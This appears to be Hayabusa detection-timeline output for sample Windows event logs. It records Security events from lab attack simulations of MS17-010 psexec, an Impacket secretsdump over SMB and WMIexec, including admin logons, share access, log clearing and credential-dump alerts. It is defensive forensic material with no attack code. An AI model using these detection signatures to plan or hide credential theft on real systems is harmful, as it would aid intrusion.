2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:19.198 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:19.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:19.291 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG\DESKTOP  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:22.992 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\MS17_010_psexec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:22.994 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG\DESKTOP\DESKTOP.INI  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\MS17_010_psexec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.042 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\MS17_010_psexec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\MS17_010_psexec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.060 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.171 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\MS17_010_psexec.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 18:00:09.959 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 60285  :  LogonID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 60232  :  LogonID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.123.11  :  Port: 50078  :  LogonID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:14.421 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: SYSTEM32\BTeHLZkJ.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: SYSTEM32\NMdzZfem.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: SYSTEM32\BTeHLZkJ.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: SYSTEM32\NMdzZfem.tmp  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:19.875 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:20.003 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG\DESKTOP  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\Impacket secret dump.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.560 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: USERS\ADMMIG\DESKTOP\DESKTOP.INI  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\Impacket secret dump.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\Impacket secret dump.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\Impacket secret dump.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.696 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\Impacket secret dump.evtx  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 20:32:00.171 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63558  :  LogonID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63534  :  LogonID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.123.11  :  Port: 50896  :  LogonID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.123.11  :  Port: 56740  :  LogonID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.123.11  :  Port: 44948  :  LogonID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.123.11  :  Port: 44948  :  LogonID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.123.11  :  Port: 44948  :  LogonID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
